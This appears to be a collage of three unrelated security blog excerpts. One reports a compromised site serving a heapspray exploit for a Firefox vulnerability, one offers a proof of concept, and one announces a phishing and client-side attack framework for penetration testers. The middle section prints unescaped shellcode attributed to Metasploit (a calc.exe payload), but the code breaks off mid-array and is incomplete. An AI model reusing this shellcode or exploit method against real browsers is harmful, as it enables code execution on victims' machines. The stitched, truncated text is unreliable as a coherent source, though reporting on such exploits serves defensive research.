After doing my usual digging through my list of malicious urls for the morning I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heapspray technique for code exec. The site that is hosting this exploit appears to be a legitimate site that was compromised. It looks like a RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.

So this 0day popped up in some malware today and has been floating around the chinese forums (darkst.com) for a while it seems. It has been reported on by all the infosec sites/blogs at this point.

For those that are interested here's a P0C.

//calc.exe thanks to msf.
var sCode=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

So I've been using a series of scripts and custom emails and webpages to do phishing/client-side attacks during pentests for a good few years now and a while back Pragmatk and I, while working on better plugin detection and a few other things for the scripts, decided we needed a GUI, better management, tracking, reports, metrics and trending, better templates, js obfuscation, database functionality, scheduling and a few other things. So basically we wanted a tool that did everything we could think of during a phish.

I've been really slow about building the web frontend but we're finally getting it to a functional beta and should have something ready for release in the next month and a half barring any unforeseen events.